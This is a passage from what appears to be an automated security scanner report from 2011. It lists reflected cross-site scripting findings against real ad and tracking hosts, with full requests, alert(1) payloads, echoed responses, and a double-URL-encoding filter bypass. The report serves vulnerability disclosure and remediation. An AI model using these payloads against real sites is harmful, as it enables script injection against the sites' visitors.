if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"961ba<script>alert(1)</script>5ef4d07457b", c16:"", r:""});



4.68. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 3d1ac<script>alert(1)</script>969635bd65a was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=59648883d1ac<script>alert(1)</script>969635bd65a&c3=2&c4=&c5=&c6=&c15=&tm=738115 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 00:52:03 GMT
Date: Sat, 17 Sep 2011 00:52:03 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"59648883d1ac<script>alert(1)</script>969635bd65a", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



4.69. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload dcffa<script>alert(1)</script>16a4cf57524 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2dcffa<script>alert(1)</script>16a4cf57524&c4=&c5=&c6=&c15=&tm=738115 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 00:52:05 GMT
Date: Sat, 17 Sep 2011 00:52:05 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
y{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2dcffa<script>alert(1)</script>16a4cf57524", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



4.70. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload d68d4<script>alert(1)</script>a87e6bee52c was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=d68d4<script>alert(1)</script>a87e6bee52c&c5=&c6=&c15=&tm=738115 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 00:52:06 GMT
Date: Sat, 17 Sep 2011 00:52:06 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"d68d4<script>alert(1)</script>a87e6bee52c", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



4.71. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload e7599<script>alert(1)</script>52183d27ea7 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=e7599<script>alert(1)</script>52183d27ea7&c6=&c15=&tm=738115 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 00:52:07 GMT
Date: Sat, 17 Sep 2011 00:52:07 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"e7599<script>alert(1)</script>52183d27ea7", c6:"", c10:"", c15:"", c16:"", r:""});



4.72. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 4342b<script>alert(1)</script>a0dd5801e26 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=4342b<script>alert(1)</script>a0dd5801e26&c15=&tm=738115 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 00:52:08 GMT
Date: Sat, 17 Sep 2011 00:52:08 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"4342b<script>alert(1)</script>a0dd5801e26", c10:"", c15:"", c16:"", r:""});



4.73. http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3c73"><script>alert(1)</script>e1b769851e7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_ATTf3c73"><script>alert(1)</script>e1b769851e7/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3? HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://attuverseoffers.com/tv_hsi_bundles/index.php?sendVar=20State_49PromoOffer&source=ECbc0000000WIP00O&fbid=9Lm6uVSxV_u
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; %2emookie1%2ecom/%2f/1/o=0/cookie; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:41:26 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 380
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_ATTf3c73"><script>alert(1)</script>e1b769851e7/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]/2021264515/Bottom3/default/empty.gif/4d686437616b357a2b73594141673869?x" target="_top">
...[SNIP]...

4.74. http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 335ab"><script>alert(1)</script>facc901f053 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_ATT/LP335ab"><script>alert(1)</script>facc901f053/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3? HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://attuverseoffers.com/tv_hsi_bundles/index.php?sendVar=20State_49PromoOffer&source=ECbc0000000WIP00O&fbid=9Lm6uVSxV_u
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; %2emookie1%2ecom/%2f/1/o=0/cookie; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:41:40 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 463
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_ATT/LP335ab"><script>alert(1)</script>facc901f053/cntacp_22UverseLPtest_LP_1_new/1[timestamp]/L9/1785929992/Bottom3/USNetwork/TRACK_Default/TRACK_Default_1x1pixel-.gif/4d686437616b357a2b74514141672b75?x" target="_blank">
...[SNIP]...

4.75. http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32bc8"><script>alert(1)</script>895c80335e5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new32bc8"><script>alert(1)</script>895c80335e5/1[timestamp]@Bottom3? HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://attuverseoffers.com/tv_hsi_bundles/index.php?sendVar=20State_49PromoOffer&source=ECbc0000000WIP00O&fbid=9Lm6uVSxV_u
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; %2emookie1%2ecom/%2f/1/o=0/cookie; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:41:54 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 463
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new32bc8"><script>alert(1)</script>895c80335e5/1[timestamp]/L9/1578951643/Bottom3/USNetwork/TRACK_Default/TRACK_Default_1x1pixel-.gif/4d686437616b357a2b754941424d6f62?x" target="_blank">
...[SNIP]...

4.76. http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71dff"><script>alert(1)</script>b41d32a101b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom371dff"><script>alert(1)</script>b41d32a101b? HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://attuverseoffers.com/tv_hsi_bundles/index.php?sendVar=20State_49PromoOffer&source=ECbc0000000WIP00O&fbid=9Lm6uVSxV_u
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; %2emookie1%2ecom/%2f/1/o=0/cookie; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:42:08 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 372
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]/1878794723/Bottom371dff"><script>alert(1)</script>b41d32a101b/default/empty.gif/4d686437616b357a2b764141426c786f?x" target="_top">
...[SNIP]...

4.77. http://bh.heraldinteractive.com/includes/processAds.bg [companion parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.heraldinteractive.com
Path:   /includes/processAds.bg

Issue detail

The value of the companion request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9bf9</script><script>alert(1)</script>cc94f26ced5 was submitted in the companion parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/processAds.bg?position=Top&companion=Top,x14,x15,Middle,Middle1,Middle2,Bottomb9bf9</script><script>alert(1)</script>cc94f26ced5&page=bh.heraldinteractive.com/news/home HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1141638517-1316021781233

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:50:40 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Vary: Accept-Encoding
Content-Length: 2154
Connection: close
Content-Type: text/html


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea
...[SNIP]...
ROLLING=no BORDERCOLOR="#000000" '+
'SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/news/home@Top,x14,x15,Middle,Middle1,Middle2,Bottomb9bf9</script><script>alert(1)</script>cc94f26ced5!Top">
...[SNIP]...

4.78. http://bh.heraldinteractive.com/includes/processAds.bg [companion parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.heraldinteractive.com
Path:   /includes/processAds.bg

Issue detail

The value of the companion request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 431a4"><script>alert(1)</script>498ee9cb580 was submitted in the companion parameter. This input was echoed as 431a4\"><script>alert(1)</script>498ee9cb580 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/processAds.bg?position=Top&companion=Top,x14,x15,Middle,Middle1,Middle2,Bottom431a4"><script>alert(1)</script>498ee9cb580&page=bh.heraldinteractive.com/news/home HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1141638517-1316021781233

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:50:36 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Vary: Accept-Encoding
Content-Length: 2118
Connection: close
Content-Type: text/html


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,x14,x15,Middle,Middle1,Middle2,Bottom431a4\"><script>alert(1)</script>498ee9cb580!Top">
...[SNIP]...

4.79. http://bh.heraldinteractive.com/includes/processAds.bg [page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.heraldinteractive.com
Path:   /includes/processAds.bg

Issue detail

The value of the page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4cfbf%2527%253balert%25281%2529%252f%252f04fb34becb4 was submitted in the page parameter. This input was echoed as 4cfbf';alert(1)//04fb34becb4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the page request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /includes/processAds.bg?position=Top&companion=Top,x14,x15,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com/news/home4cfbf%2527%253balert%25281%2529%252f%252f04fb34becb4 HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1141638517-1316021781233

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:50:44 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Vary: Accept-Encoding
Content-Length: 2022
Connection: close
Content-Type: text/html


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea
...[SNIP]...
'HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000" '+
'SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/news/home4cfbf';alert(1)//04fb34becb4@Top,x14,x15,Middle,Middle1,Middle2,Bottom!Top">
...[SNIP]...

4.80. http://bh.heraldinteractive.com/includes/processAds.bg [page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.heraldinteractive.com
Path:   /includes/processAds.bg

Issue detail

The value of the page request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97e2b"><script>alert(1)</script>d1318e1e89 was submitted in the page parameter. This input was echoed as 97e2b\"><script>alert(1)</script>d1318e1e89 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/processAds.bg?position=Top&companion=Top,x14,x15,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com/news/home97e2b"><script>alert(1)</script>d1318e1e89 HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1141638517-1316021781233

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:50:43 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Vary: Accept-Encoding
Content-Length: 2112
Connection: close
Content-Type: text/html


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home97e2b\"><script>alert(1)</script>d1318e1e89@Top,x14,x15,Middle,Middle1,Middle2,Bottom!Top">
...[SNIP]...

4.81. http://bh.heraldinteractive.com/includes/processAds.bg [position parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.heraldinteractive.com
Path:   /includes/processAds.bg

Issue detail

The value of the position request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2cb2a</script><script>alert(1)</script>60f4c826daf was submitted in the position parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/processAds.bg?position=Top2cb2a</script><script>alert(1)</script>60f4c826daf&companion=Top,x14,x15,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com/news/home HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1141638517-1316021781233

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:50:29 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Vary: Accept-Encoding
Content-Length: 2149
Connection: close
Content-Type: text/html


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea
...[SNIP]...
ING=no BORDERCOLOR="#000000" '+
'SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/news/home@Top,x14,x15,Middle,Middle1,Middle2,Bottom!Top2cb2a</script><script>alert(1)</script>60f4c826daf">
...[SNIP]...

4.82. http://bh.heraldinteractive.com/includes/processAds.bg [position parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.heraldinteractive.com
Path:   /includes/processAds.bg

Issue detail

The value of the position request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29a42"><script>alert(1)</script>f1bf5dd16e2 was submitted in the position parameter. This input was echoed as 29a42\"><script>alert(1)</script>f1bf5dd16e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

